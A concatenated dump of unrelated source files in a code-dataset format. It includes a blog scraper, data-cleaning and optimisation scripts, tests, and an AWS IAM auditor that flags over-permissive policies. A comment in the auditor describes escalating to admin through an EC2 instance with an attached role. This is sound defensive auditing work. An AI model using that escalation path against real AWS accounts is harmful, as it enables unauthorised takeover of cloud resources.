.batch(1) \
.repeat(5)
for x, y in train_data:
print(x) | 2.71875 | 3 |
myapp.py | dataholiks/flask_heroku_scheduler | 7 | 5542 | from flask import Flask
app = Flask(__name__)
@app.route('/')
def index():
return 'This is the app index page.'
| 2.265625 | 2 |
day_ok/schedule/migrations/0027_auto_20210216_1337.py | bostud/day_ok | 0 | 5543 | # Generated by Django 3.1.6 on 2021-02-16 11:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('schedule', '0026_event'),
]
operations = [
migrations.AlterField(
model_name='group',
name='students',
field=models.ManyToManyField(blank=True, to='schedule.Student', verbose_name='Учні'),
),
migrations.AlterField(
model_name='teacher',
name='subjects',
field=models.ManyToManyField(blank=True, to='schedule.Subject', verbose_name='Предмети'),
),
]
| 1.523438 | 2 |
Blog.py | OliverChao/PyWhoAmI | 0 | 5544 | <gh_stars>0
import aiohttp
import asyncio
import time
import time
import argparse
import glob
import os
import shutil
import random
import re
import requests
import sys
from concurrent import futures
import pdfkit
import time
from retrying import retry
from pygments import highlight
from pygments.lexers import guess_lexer, get_lexer_by_name
from pygments.lexers import CppLexer
from pygments.formatters.terminal import TerminalFormatter
from pygments.util import ClassNotFound
from pyquery import PyQuery as pq
from requests.exceptions import ConnectionError
from requests.exceptions import SSLError
import numbers
if sys.version < '3':
import codecs
from urllib import quote as url_quote
from urllib import getproxies
# Handling Unicode: http://stackoverflow.com/a/6633040/305414
def u(x):
return codecs.unicode_escape_decode(x)[0]
else:
from urllib.request import getproxies
from urllib.parse import quote as url_quote
def u(x):
return x
scripFilePath = os.path.split(os.path.realpath(__file__))[0]
PDF_DIR = os.path.join(scripFilePath,'whoamiPDFdir')
CPP_DIR = os.path.join(scripFilePath,'whoamiCPPdir')
class Result(object):
def __init__(self, host, args):
self.args = args
self.host = host
self._search_url = 'https://www.bing.com/search?q=site:{0}%20{1}'
self._USER_AGENTS = ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:11.0) Gecko/20100101 Firefox/11.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100 101 Firefox/22.0',
# 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0',
('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) '
'Chrome/19.0.1084.46 Safari/536.5'),
('Mozilla/5.0 (Windows; Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46'
'Safari/536.5'), )
self.data = self.whoami()
def __call__(self, *args, **kwargs):
return self.show_results()
def __len__(self):
return len(self.data)
def whoami(self):
self.args['query'] = ' '.join(self.args['query']).replace('?', '')
try:
return self.confirm_links() or 'Sorry, couldn\'t find any help with that topic\n'
except (ConnectionError, SSLError):
return 'Failed to establish network connection\n'
def confirm_links(self):
dic = self._get_dict(self.args['query'])
if not dic:
return False
'''先不检验。。测试多个域名。。'''
return dic
# def _is_article(link):
# return re.search('article/details/\d+', link)
# # question_links = [link for link in links if _is_article(link)]
# # https://blog.csdn.net/u013177568/article/details/62432761
# confirm_dict = {k: v for k, v in dic.items() if _is_article(v)}
# return confirm_dict
def _get_dict(self, query):
search_url = self._search_url.format(self.host, url_quote(query))
# search_url : site:blog.csdn.net 1173 HDU
result = self._get_result(search_url)
html = pq(result)
# return the anser_list
return self._extract_links(html, 'bing')
@retry(stop_max_attempt_number=3)
def _get_result(self, url):
try:
return requests.get(url, headers={'User-Agent': random.choice(self._USER_AGENTS)}, ).text
# verify = VERIFY_SSL_CERTIFICATE).text
except requests.exceptions.SSLError as e:
print('[ERROR] Encountered an SSL Error.\n')
print('[*]retrying again automatically ')
raise e
def _extract_links(self, html, search_engine):
if search_engine == 'bing':
return self._extract_dict_from_bing(html)
return None
@staticmethod
def _extract_dict_from_bing(html):
html.remove_namespaces()
dic = {}
for a in html('.b_algo')('h2')('a'):
# name ='[*{0}*] {1}'.format(str(num),a.text)
name = a.text
link = a.attrib['href']
dic[name] = str(link)
# num+=1
return dic
def show_results(self):
if isinstance(self.data,str):
print('[!!] ',self.data)
return
num = 0
for k, v in self.data.items():
print('[*{}*] '.format(str(num)), end='')
print(k, end=' [*link*] ')
print(v)
num += 1
class Blog(Result):
def __init__(self, host, args):
super().__init__(host, args)
self.links = list(self.data.values())
def show_code(self):
url = list(self.data.values())[self.args['print']]
main_page = self._parse_url(url)
s = self._get_code(main_page, self.args) or 'sorry,this article has no code...'
print(s)
def save_to_pdf(self, url):
html_template = u"""
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<!-- <center><h1>{title}</h1></center> -->
{content}
</body>
</html>
"""
options = {
'page-size': 'Letter',
'margin-top': '0.75in',
'margin-right': '0.75in',
'margin-bottom': '0.75in',
'margin-left': '0.75in',
'encoding': "UTF-8",
'custom-header': [
('Accept-Encoding', 'gzip')
],
'cookie': [
('cookie-name1', 'cookie-value1'),
('cookie-name2', 'cookie-value2'),
],
'outline-depth': 10,
}
main_page = self._parse_url(url)
title = main_page('h1').eq(0).text()
title = re.sub('[<>\?\\\/:\*\s\[\]\(\)\-]', '.', title)
html = html_template.format(title='Oliver loves Annabelle forever~', content=main_page.html())
if not os.path.exists(PDF_DIR):
os.makedirs(PDF_DIR)
filePath = os.path.join(PDF_DIR, title + '.pdf')
if self._test_is_open_if_exists(filePath):
return
try:
print('[*] save to ', filePath)
self._save_to_pdf(html,filePath)
print('[*] successfully ')
except:
print('[!!]要保存的网页可能有网页冲突')
print('[注]保存html等语言的文档冲突的几率较大')
print('[!!]save failed')
print('[!!]如果事因为图片路径造成的保存失败,文字和代码部分则会正常生成pdf,')
try:
# 系统级命令好像try不到。。。
self.open_after_save(filePath)
except:
print('[!!]文件未打开,可能保存时发生IO错误。。')
print('[!!]请重新生成pdf,或者,该网页的结构不符合生成pdf的标准')
print('[~~]请见谅。。。。')
@staticmethod
def _save_to_pdf(html, filepath):
wkhtmltopdf_path = scripFilePath + '/wkhtmltox/bin/wkhtmltopdf.exe'
config = pdfkit.configuration(wkhtmltopdf=wkhtmltopdf_path)
pdfkit.from_string(html, filepath, configuration=config)
def open_after_save(self, pdf_path):
if not self.args['open_pdf']:
return
try:
if len(self.args['save']):
return False
except TypeError as e:
pass
# if args['pdf'] and PDFpath.split('.')[-1]!='pdf':
# PDFpath += '.pdf'
os.popen(pdf_path)
def _test_is_open_if_exists(self, file_path):
try:
if len(self.args['save']):
return False
except TypeError as e:
pass
if self.args['open_pdf']:
if os.path.exists(file_path):
print('文件已经存在,直接打开')
os.popen(file_path)
return True
else:
return False
def _parse_url(self, url):
'''
:param url: 网页url
:return: 返回网页的主要区域的pyquery
'''
page = self._get_result(url)
html = pq(page)
# the main part of the article
return html('.blog-content-box')
def _get_code(self, main_page, args):
'''
:param main_page:main_page=_parse_url(url)
:param args: args
:return: str
'''
html = main_page('article')('pre')('code') or main_page('article')('pre')
if not html:
return None
ans = []
ans_split = '\n' + '<==>' * 17 + '\n'
if args['all_code']:
for node in html:
node = pq(node)
s = node.html()
# s=re.sub('</?[^>]+>','',s)
s = re.sub('<((span)|(code)|(/span)|(/code)){1}.*?>', '', s)
s = s.replace('>', '>').replace('<', '<')
ans.append(self._add_color(s, args))
else:
node = pq(html[-1])
s = node.html()
s = re.sub('<((span)|(code)|(/span)|(/code)){1}.*?>', '', s)
s = s.replace('>', '>').replace('<', '<')
ans.append(self._add_color(s, args))
return ans_split.join(ans)
@staticmethod
def _add_color(code, args):
if not args['color']:
return code
lexer = None
try:
lexer = guess_lexer(code)
except ClassNotFound:
return code
return highlight(code, CppLexer(), TerminalFormatter(bg='dark'))
def save_to_cpp(self):
ans_split = '\n' + '<==>' * 17 + '\n'
url = self.links[self.args['number_link']]
main_page = self._parse_url(url)
title = main_page('h1').eq(0).text()
title = re.sub('[<>\?\\\/:\*\s]', '.', title)
s = self._get_code(main_page, self.args)
if not s:
print('sorry , this article has no code...')
print('please try another...')
return
if not os.path.exists(CPP_DIR):
os.makedirs(CPP_DIR)
filePath = os.path.join(CPP_DIR, title + '.cpp')
if self._test_is_open_if_exists(filePath):
return
code = s.split(ans_split)[-1]
with open(filePath, 'w')as f:
f.write(code)
print('[*]save successfully...')
try:
self.open_after_save(filePath)
except:
print('[!!]文件未打开,可能保存时发生IO错误。。')
print('[!!]open failed') | 2.125 | 2 |
corehq/apps/app_manager/tests/test_xml_parsing.py | dslowikowski/commcare-hq | 1 | 5545 | from django.test import SimpleTestCase as TestCase
from corehq.apps.app_manager.models import _parse_xml
import os
class XMLParsingTest(TestCase):
def testUnicodeError(self):
"""Tests a bug found in Unicode processing of a form"""
file_path = os.path.join(os.path.dirname(__file__), "data", "unicode_error_form.xhtml")
with open(file_path, "rb") as f:
xml_data = f.read()
try:
_parse_xml(xml_data) # this should not raise an error
except:
self.fail("Parsing normal string data shouldn't fail!")
try:
_parse_xml(unicode(xml_data))
except:
self.fail("Parsing unicode data shouldn't fail!")
| 2.75 | 3 |
dynamic_programming/01/01-06.py | fumiyanll23/algo-method | 0 | 5546 | # input
N, M = map(int, input().split())
Ds = [*map(int, input().split())]
# compute
dp = [False] * (N+1)
for ni in range(N+1):
if ni == 0:
dp[ni] = True
for D in Ds:
if ni >= D:
dp[ni] = dp[ni] or dp[ni-D]
# output
print("Yes" if dp[-1] else "No")
| 2.875 | 3 |
swapsort.py | ArshSood/sorting | 0 | 5547 | # sorting
n=int(input())
array=list(map(int,input().split()))
i=0
count=[]
counter=0
while i<len(array):
min=i
start=i+1
while(start<len(array)):
if array[start]<array[min]:
min=start
start+=1
if i!=min:
array[i],array[min]=array[min],array[i]
count.append(i)
count.append(min)
counter+=1
i+=1
print(counter)
for i in range(0,len(count)):
print(count[i],end=" ")
| 3.3125 | 3 |
tests/news_test.py | mucciz/News | 0 | 5548 | import unittest
from app.models import News
# News = news.News
class NewsTest(unittest.TestCase):
'''
Test Class to test the behaviour of the Movie class
'''
def setUp(self):
'''
Set up method that will run before every Test
'''
self.new_news = News('abc-news','ABC NEWS','Your trusted source for breaking news, analysis, exclusive interviews, headlines, and videos at ABCNews.com.','http://www.abc.net.au/news','business','au')
def test_instance(self):
self.assertTrue(isinstance(self.new_news,News))
def test_init(self):
self.assertEqual(self.new_news.id,'abc-news')
self.assertEqual(self.new_news.name,'ABC NEWS')
self.assertEqual(self.new_news.description,'Your trusted source for breaking news, analysis, exclusive interviews, headlines, and videos at ABCNews.com.')
self.assertEqual(self.new_news.url,'http://www.abc.net.au/news')
self.assertEqual(self.new_news.country,'au')
# if __name__ == '__main__':
# unittest.main()
| 3.75 | 4 |
test/get-gh-comment-info.py | MQasimSarfraz/cilium | 1 | 5549 | <gh_stars>1-10
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('ghcomment', type=str) # this is for test-me-please phrases
parser.add_argument('--focus', type=str, default="")
parser.add_argument('--version', type=str, default="")
parser.add_argument('--retrieve', type=str, default="focus")
args = parser.parse_args()
print args.__dict__[args.retrieve]
| 2.5625 | 3 |
preprocessing/booking.py | madcat1991/clustered_cars | 0 | 5550 | <gh_stars>0
"""
This script cleans and prepares the data set of bookings for the future usage
"""
import argparse
import logging
import sys
import pandas as pd
from preprocessing.common import canonize_datetime, raw_data_to_df, check_processed_columns, check_data
OLD_BREAKPOINT_MATCHER = {
2001: [
(1, 1, "New Year"), (1, 6, "Winter"),
(2, 17, "Half Terms"), (2, 24, "Spring and Autumn"),
(4, 7, "Easter"), (4, 21, "Spring and Autumn"),
(5, 26, "SBH"),
(6, 2, "Early Summer"),
(7, 21, "Summer holidays"),
(9, 1, "Early Autumn"), (9, 15, "Spring and Autumn"),
(10, 27, "Half Terms"),
(11, 3, "Winter"),
(12, 22, "Christmas"), (12, 29, "New Year"),
],
2002: [
(1, 1, "New Year"), (1, 5, "Winter"),
(2, 16, "Half Terms"), (2, 23, "Spring and Autumn"),
(4, 6, "Easter"), (4, 20, "Spring and Autumn"),
(5, 25, "SBH"),
(6, 1, "Early Summer"),
(7, 20, "Summer holidays"),
(8, 31, "Early Autumn"),
(9, 14, "Spring and Autumn"),
(10, 26, "Half Terms"),
(11, 2, "Winter"),
(12, 21, "Christmas"), (12, 28, "New Year"),
],
2003: [
(1, 1, "New Year"), (1, 4, "Winter"),
(2, 15, "Half Terms"), (2, 22, "Spring and Autumn"),
(4, 5, "Easter"), (4, 19, "Spring and Autumn"),
(5, 24, "SBH"), (5, 31, "Early Summer"),
(7, 19, "Summer holidays"),
(8, 30, "Early Autumn"),
(9, 13, "Spring and Autumn"),
(10, 25, "Half Terms"),
(11, 1, "Winter"),
(12, 20, "Christmas"), (12, 27, "New Year"),
],
2004: [
(1, 1, "New Year"), (1, 3, "Winter"),
(2, 14, "Half Terms"), (2, 21, "Spring and Autumn"),
(4, 3, "Easter"), (4, 17, "Spring and Autumn"),
(5, 22, "SBH"), (5, 29, "Early Summer"),
(7, 17, "Summer holidays"),
(8, 28, "Early Autumn"),
(9, 11, "Spring and Autumn"),
(10, 23, "Half Terms"), (10, 30, "Winter"),
(12, 18, "Christmas"),
],
2005: [
(1, 1, "Winter"),
(2, 12, "Half Terms"), (2, 19, "Spring and Autumn"),
(4, 2, "Easter"), (4, 16, "Spring and Autumn"),
(5, 21, "SBH"), (5, 28, "Early Summer"),
(7, 16, "Summer holidays"),
(8, 27, "Early Autumn"),
(9, 10, "Spring and Autumn"),
(10, 22, "Half Terms"), (10, 29, "Winter"),
(12, 17, "Christmas"), (12, 31, "New Year"),
],
2006: [
(1, 1, "New Year"), (1, 7, "Winter"),
(2, 18, "Half Terms"), (2, 25, "Spring and Autumn"),
(4, 8, "Easter"), (4, 22, "Spring and Autumn"),
(5, 27, "SBH"),
(6, 3, "Early Summer"),
(7, 22, "Summer holidays"),
(9, 2, "Early Autumn"), (9, 16, "Spring and Autumn"),
(10, 28, "Half Terms"),
(11, 4, "Winter"),
(12, 23, "Christmas"), (12, 30, "New Year"),
],
2007: [
(1, 1, "New Year"), (1, 6, "Winter"),
(2, 17, "Half Terms"), (2, 24, "Spring and Autumn"),
(4, 7, "Easter"),
(4, 21, "Spring and Autumn"),
(5, 26, "SBH"),
(6, 2, "Early Summer"),
(7, 21, "Summer holidays"),
(9, 1, "Early Autumn"), (9, 15, "Spring and Autumn"),
(10, 27, "Half Terms"),
(11, 3, "Winter"),
(12, 22, "Christmas"), (12, 29, "New Year"),
],
2008: [
(1, 1, "New Year"), (1, 5, "Winter"),
(2, 16, "Half Terms"), (2, 23, "Spring and Autumn"),
(3, 22, "Easter"),
(4, 19, "Spring and Autumn"),
(5, 24, "SBH"), (5, 31, "Early Summer"),
(7, 19, "Summer holidays"),
(8, 30, "Early Autumn"),
(9, 13, "Spring and Autumn"),
(10, 25, "Half Terms"),
(11, 1, "Winter"),
(12, 20, "Christmas"),
],
}
COLS_TO_DROP = [
'pname', 'region', 'sleeps', 'stars', 'proppostcode', # can be taken from property
'bookdate_scoreboard', 'book_year', 'hh_gross', 'hh_net', 'ho', # HH specific
'holidayprice', # correlates with avg_spend_per_head
'bighouse', 'burghisland', 'boveycastle', # no need
'sourcecostid', # is a pair of u'sourcedesc', u'category'
'drivedistance', # correlates with drivetime
]
NOT_NA_COLS = [u'bookcode', u'code', u'propcode', u'year', u'breakpoint', u'avg_spend_per_head']
DATE_COLS = [u'bookdate', u'sdate', u"fdate"]
FLOAT_COLS = [u'avg_spend_per_head', u'drivetime']
INT_COLS = [u'adults', u'babies', u'children', u'pets']
CATEGORICAL_COLS = [u'sourcedesc', u'category']
def get_breakpoint(dt):
breakpoint = None
matcher = OLD_BREAKPOINT_MATCHER.get(dt.year, [])
for _m, _d, _b in matcher:
if _m > dt.month or (_m == dt.month and _d > dt.day):
break
breakpoint = _b
return breakpoint
def fine_tune_df(df):
logging.info(u"DF shape before fine tuning: %s", df.shape)
averages = {col: df[col].dropna().mean() for col in FLOAT_COLS}
zeros = {col: 0 for col in INT_COLS}
most_popular_values = {col: df[col].value_counts().index[0] for col in CATEGORICAL_COLS}
logging.info(u"Filling NA with average: %s", averages)
df = df.fillna(averages)
logging.info(u"Filling NA with zeros: %s", zeros)
df = df.fillna(zeros)
logging.info(u"Filling NA with most populars: %s", most_popular_values)
df = df.fillna(most_popular_values)
df[INT_COLS] = df[INT_COLS].astype(int)
logging.info(u"Before cleaning NA: %s", df.shape)
df = df.dropna(subset=NOT_NA_COLS)
logging.info(u"After cleaning NA: %s", df.shape)
if pd.isnull(df.values).any():
logging.error(u"NA values left in df")
return df
def fill_missed_breakpoints(df):
df = df[pd.notnull(df.breakpoint) | pd.notnull(df.zone_name)]
logging.info(u"Bookings having breakpoint or zone_name: %s", df.shape[0])
logging.info(u"Filling missing breakpoints: %s", df[pd.isnull(df.breakpoint)].shape[0])
df.breakpoint[pd.isnull(df.breakpoint)] = df[pd.isnull(df.breakpoint)].sdate.apply(get_breakpoint)
logging.info(u"Left NA breakpoints: %s", df[pd.isnull(df.breakpoint)].shape[0])
return df.drop(u'zone_name', axis=1)
def main():
check_data(args.input_csv, args.input_csv_delimiter)
df = raw_data_to_df(args.input_csv, args.input_csv_delimiter)
original_columns = df.columns
logging.info(u"DF initial shape: %s", df.shape)
df = df.drop(COLS_TO_DROP, axis=1)
df = canonize_datetime(df, DATE_COLS)
df = fill_missed_breakpoints(df)
df = fine_tune_df(df)
processed_columns = set(df.columns).union(COLS_TO_DROP + [u'zone_name'])
check_processed_columns(processed_columns, original_columns)
logging.info(u"Dumping data to: %s", args.output_csv)
df.to_csv(args.output_csv, index=False)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-i', required=True, dest="input_csv",
help=u'Path to a csv file with bookings')
parser.add_argument('--id', default=";", dest="input_csv_delimiter",
help=u"The input file's delimiter. Default: ';'")
parser.add_argument('-o', default="bookings.csv", dest="output_csv",
help=u'Path to an output file. Default: booking.csv')
parser.add_argument("--log-level", default='INFO', dest="log_level",
choices=['DEBUG', 'INFO', 'WARNINGS', 'ERROR'], help=u"Logging level")
args = parser.parse_args()
logging.basicConfig(
format='%(asctime)s %(levelname)s:%(message)s', stream=sys.stdout, level=getattr(logging, args.log_level)
)
main()
| 2.390625 | 2 |
src/api/wish.py | PKU-GeekGame/gs-backend | 7 | 5551 | from sanic import Blueprint, Request, HTTPResponse, response
from sanic.models.handler_types import RouteHandler
from functools import wraps
from inspect import isawaitable
from typing import Callable, Dict, Any, Union, Awaitable, List, Optional
ACCEPTED_WISH_VERS = ['wish.alpha.v1']
WishHandler = Callable[..., Union[Dict[str, Any], Awaitable[Dict[str, Any]]]]
def wish_endpoint(bp: Blueprint, uri: str, *, methods: Optional[List[str]] = None) -> Callable[[WishHandler], RouteHandler]:
if methods is None:
methods = ['POST']
def decorator(fn: WishHandler) -> RouteHandler:
@wraps(fn)
async def wrapped(req: Request, *args: Any, **kwargs: Any) -> HTTPResponse:
v = req.headers.get('X-Wish-Version', '(none)')
if v not in ACCEPTED_WISH_VERS:
return response.json({
'error': 'WISH_VERSION_MISMATCH',
'error_msg': f'前端版本 {v} 不是最新',
})
retval_ = fn(req, *args, **kwargs)
retval = (await retval_) if isawaitable(retval_) else retval_
return response.json({
'error': None, # may be overridden by retval
**retval,
})
return bp.route(uri, methods)(wrapped) # type: ignore
return decorator | 2.078125 | 2 |
scripts/venv/lib/python2.7/site-packages/cogent/maths/function_optimisation.py | sauloal/cnidaria | 3 | 5552 | #!/usr/bin/env python
"""Algorthims for function optimisation
great_deluge() is a hillclimbing algorithm based on:
Gunter Dueck: New Optimization Heuristics, The Great Deluge Algorithm
and the Record-to-Record Travel. Journal of Computational Physics, Vol.
104, 1993, pp. 86 - 92
ga_evolve() is a basic genetic algorithm in which all internal functions can
be overridden
NOTE: both optimisation functions are generators.
"""
from numpy.random import normal
__author__ = "<NAME> and <NAME>"
__copyright__ = "Copyright 2007-2012, The Cogent Project"
__credits__ = ["<NAME>", "<NAME>"]
__license__ = "GPL"
__version__ = "1.5.3"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
def _simple_breed(best, num, mutation_rate, random_f):
"""Returns num copies of parent with mutation_rate changes"""
result = []
score, parent = best
for child_number in range(num):
if random_f() <= mutation_rate:
child = parent.mutate()
result.append(child)
else:
result.append(parent)
return result
def _simple_score(child, target):
"""Returns the childs score as defined by the childs scoring function"""
return child.score(target)
def _simple_init(parent, num):
"""Creates a list parent copies"""
return [parent.copy() for i in range(num)]
def _simple_select(population, scores):
"""Returns a tuple: (best_score, best_child)"""
scored = zip(scores, population)
scored.sort()
return scored[0]
def great_deluge(a, step_factor=500, max_iter=100, max_total_iters=1000):
"""This generator makes random variations of the object a to minimize cost.
Yields are performed at the end of each iteration and a tuple containing
((iter_count, total_iters), a) is returned. iter_count is used to
kill the while loop in the event that no new objects are found with a
better cost. iter_count gets reset each time an object with a better
cost is found. total_iters will kill the while loop when the total
number of iterations through the loop reaches max_total_iters
Object a must implement methods cost() and perturb() for evaluating
the score and making mutations respectively. Usually, you'll want to
write a wrapper that passes these through to methods of an internal
data object, or functions acting on that object.
"""
water_level = curr_cost = a.cost() # can't be worse than initial guess
step_size = abs(water_level)/step_factor
iter_count = 0
total_iters = 0
while iter_count < max_iter and total_iters < max_total_iters:
new = a.perturb()
new_cost = new.cost()
if new_cost < water_level:
if new_cost < curr_cost:
water_level = max(curr_cost, water_level - step_size)
iter_count = 0 # WARNING: iter_count is reset here!
curr_cost = new_cost
a = new
else:
iter_count += 1
yield ((iter_count, total_iters), a)
total_iters += 1
def ga_evolve(parent, target, num, mutation_rate=0.01, score_f=_simple_score,
breed_f=_simple_breed, select_f=_simple_select,
init_f=_simple_init, random_f=normal, max_generations=1000):
"""Evolves a population based on the parent to the target
Parent must implement methods copy(), mutate(), and score(target) to be
used with the simple default functions.
Yields are performed at the end of each iteration and contain the tuple
(generation, best). The default functions return the tuple
(generation, (best_score, best_obj)).
Arguments:
parent: Object to create initial population from.
target: The goal of the evolution.
num: Population size.
mutation_rate: Rate at which objects in the population are mutated.
score_f: Function to score the object against the target.
breed_f: Function to create new population with mutations
select_f: Function to select best object(s) from the population
random_f: Function to be used in breed_f
max_generations: Kills while loop if max_generations is reached
Overload default functions:
score_f: Must take an object and a target score. Returns objects
score.
breed_f: Must take a tuple containing (scores, objects), the size of
population, a mutation rate and random function to use.
Returns a list containing the initial population. Default
function takes only the best object, but this may not be
desired behavior.
select_f: Must take a population and scores. Returns a tuple
containing the best scores and objects in the population.
Default function returns only the best score and object.
init_f: Must take an object and the size of the population. Returns
a list containing the starting population
"""
generation = 0
population = init_f(parent, num)
while generation < max_generations:
scores = [score_f(child, target) for child in population]
best = select_f(population, scores)
population = breed_f(best, num, mutation_rate, random_f)
yield (generation, best)
generation += 1
| 3.140625 | 3 |
collect_policies.py | jonathanbglass/parallel_prowler | 3 | 5553 | import argparse
import boto3
import json
import logging
import os
from progressbar import ProgressBar
import sys
"""
Collects IAM Policies
Evaluates policies looking for badness (*.*, Effect:Allow + NotAction)
Need to add more tests/use cases
"""
def get_policies(profile):
session = boto3.session.Session(profile_name=profile)
myiam = session.client('iam')
marker = None
allPolicies = []
passcount = 1
while True:
pbar = ProgressBar('Collecting Policies')
print("Policy Collection, Pass Number: {}".format(passcount))
passcount += 1
if marker:
response_iterator = myiam.list_policies(OnlyAttached=True,
Marker=marker)
else:
response_iterator = myiam.list_policies(OnlyAttached=True)
for p in pbar(response_iterator['Policies']):
polVers = myiam.get_policy_version(
PolicyArn=p['Arn'], VersionId=p['DefaultVersionId'])
mypol = {'Policy': p, 'PolicyVersion': polVers['PolicyVersion']}
allPolicies.append(mypol)
pfl = open(os.path.join('policies/', p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(mypol, default=str, indent=4))
pfl.close()
ae = myiam.list_entities_for_policy(PolicyArn=p['Arn'])
pfl = open(os.path.join('attachedentities/',
p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(ae, default=str, indent=4))
pfl.close()
try:
marker = response_iterator['Marker']
except KeyError:
break
print("\nTotal Policies: {}".format(len(allPolicies)))
pbar = ProgressBar('\tChecking for Dangerous Policies')
for p in pbar(allPolicies):
# This section looks for bad/dangerous patterns
# Pattern 1: Allow *.*
# AWSLambdaRole {
# 'Version': '2012-10-17',
# 'Statement': [
# {'Effect': 'Allow',
# 'Action': '*',
# 'Resource': ['*']
# }
# ]
# }
try:
q = p['PolicyVersion']['Document']['Statement'][0]
except Exception as e:
print("Problem parsing this policy: {}".format(p))
logging.debug("Problem parsing this policy: {}".format(p))
print(e)
continue
try:
if (q['Effect'] == "Allow" and '*' in q['Resource']
and '*' in q['Action']):
print("Review Dangerous Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
# Pattern 2: Allow: *, NotAction
# {'Version': '2012-10-17',
# 'Statement': [
# {
# 'Effect': 'Allow',
# 'NotAction': ['iam:*', 'organizations:*', 'account:*'],
# 'Resource': '*'
# },
# {
# 'Effect': 'Allow',
# 'Action': [ 'iam:CreateServiceLinkedRole',
# 'iam:DeleteServiceLinkedRole',
# 'iam:ListRoles',
# 'organizations:DescribeOrganization',
# 'account:ListRegions'
# ],
# 'Resource': '*'
# }
# ]}
# This policy blacklists all 'iam:*', 'organizations:*', and
# 'accounts:*' with the NotAction. Then it grants specific
# access in the next stanza ('iam:ListRoles', etc)
# The fatal flaw is that it grants access to everything else,
# like lambda or ec2 because of the "Allow" in the first stanza.
# This user can create an EC2 instance, attach an admin role to
# it, and login and give themselves access to Admin. Instance
# privilege escalation.
try:
if (q['NotAction'] and q['Effect'] == 'Allow'
and q['Resource'] == '*'):
print("Review Suspect Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
return
def check_args_creds(args):
# handle profiles / authentication / credentials
workingCreds = False
global logging
global workingProfiles
workingProfiles = []
if not args.profile:
logging.info("Using AWS Default Profile")
if (not check_profile("default")):
logging.error("Default credentials not working.")
print("Default credentials not working.")
quit()
else:
workingProfiles.append("default")
workingCreds = True
if args.profile and args.profile is not None:
logging.info("Using " + args.profile + " Profile")
if (not check_profile(args.profile)):
logging.error("Profile " + args.profile + " not working")
exit(1)
else:
logging.info("Profile " + args.profile + " working")
workingProfiles.append(args.profile)
workingCreds = True
return args.profile
def check_profile(profile):
global logging
try:
if(profile == "default"):
client = boto3.session.Session()
else:
logging.info("Testing profile: " + profile)
client = boto3.session.Session(profile_name=profile)
except Exception as e:
logging.error("Error connecting: ")
logging.error(e)
return False
try:
iam = client.client('iam')
response = iam.list_users()
except Exception as e:
logging.error("Error listing users: ")
logging.error(e)
return False
if len(response['Users']) == 0:
logging.info("No users")
if len(response) > 0:
usercnt = len(response['Users'])
if(usercnt > 1):
userresp = " Users"
else:
userresp = " User"
logging.info(str(usercnt) + userresp)
return True
def setup_args(parser):
parser.add_argument("-p", "--profile",
help="AWS Profile")
parser.add_argument("-l", "--log",
help="Log Level")
def main():
global logging
parser = argparse.ArgumentParser()
setup_args(parser)
global args
args = parser.parse_args()
if args.log and args.log.upper() == "DEBUG":
loglevel = "DEBUG"
else:
loglevel = "INFO"
logging.basicConfig(filename='policyAssessment.log',
format='%(levelname)s:%(message)s',
level=loglevel)
profile = check_args_creds(args)
get_policies(profile)
if __name__ == "__main__":
# execute only if run as a script
main()
| 2.296875 | 2 |
test/molecule-role/molecule/integrations/tests/test_nagios.py | StackVista/stackstate-agent | 2 | 5554 | import json
import os
import re
from testinfra.utils.ansible_runner import AnsibleRunner
import util
testinfra_hosts = AnsibleRunner(os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('agent-integrations')
def _get_key_value(tag_list):
for key, value in (pair.split(':', 1) for pair in tag_list):
yield key, value
def _component_data(json_data, type_name, external_id_assert_fn, tags_assert_fn):
for message in json_data["messages"]:
p = message["message"]["TopologyElement"]["payload"]
if "TopologyComponent" in p and \
p["TopologyComponent"]["typeName"] == type_name and \
external_id_assert_fn(p["TopologyComponent"]["externalId"]):
data = json.loads(p["TopologyComponent"]["data"])
if tags_assert_fn(dict(_get_key_value(data["tags"]))):
return data
return None
def test_nagios_mysql(host):
def assert_topology():
topo_url = "http://localhost:7070/api/topic/sts_topo_process_agents?limit=1500"
data = host.check_output('curl "{}"'.format(topo_url))
json_data = json.loads(data)
with open("./topic-nagios-topo-process-agents.json", 'w') as f:
json.dump(json_data, f, indent=4)
external_id_pattern = re.compile(r"urn:container:/agent-integrations:.*")
components = [
{
"assertion": "Should find the nagios container",
"type": "container",
"external_id": lambda e_id: external_id_pattern.findall(e_id),
"tags": lambda t: t["container_name"] == "ubuntu_nagios_1"
},
{
"assertion": "Should find the mysql container",
"type": "container",
"external_id": lambda e_id: external_id_pattern.findall(e_id),
"tags": lambda t: t["container_name"] == "ubuntu_mysql_1"
}
]
for c in components:
print("Running assertion for: " + c["assertion"])
assert _component_data(
json_data=json_data,
type_name=c["type"],
external_id_assert_fn=c["external_id"],
tags_assert_fn=c["tags"],
) is not None
util.wait_until(assert_topology, 30, 3)
def test_container_metrics(host):
url = "http://localhost:7070/api/topic/sts_multi_metrics?limit=1000"
def wait_for_metrics():
data = host.check_output("curl \"%s\"" % url)
json_data = json.loads(data)
with open("./topic-nagios-sts-multi-metrics.json", 'w') as f:
json.dump(json_data, f, indent=4)
def get_keys(m_host):
return set(
''.join(message["message"]["MultiMetric"]["values"].keys())
for message in json_data["messages"]
if message["message"]["MultiMetric"]["name"] == "convertedMetric" and
message["message"]["MultiMetric"]["host"] == m_host
)
